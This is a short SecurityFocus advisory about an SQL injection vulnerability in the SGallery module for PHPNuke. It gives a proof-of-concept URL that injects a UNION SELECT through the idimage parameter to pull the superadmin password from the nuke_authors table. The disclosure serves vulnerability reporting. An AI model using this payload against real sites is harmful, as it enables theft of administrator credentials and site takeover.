Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SGallery Module For PHPNuke SQL Injection Vulnerability

An exploit is not required.

The following proof of concept example is available:
http://www.example.com/nuke75/modules/Sgallery/imageview.php?idimage=-99/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1







 

Privacy Statement
Copyright 2008, SecurityFocus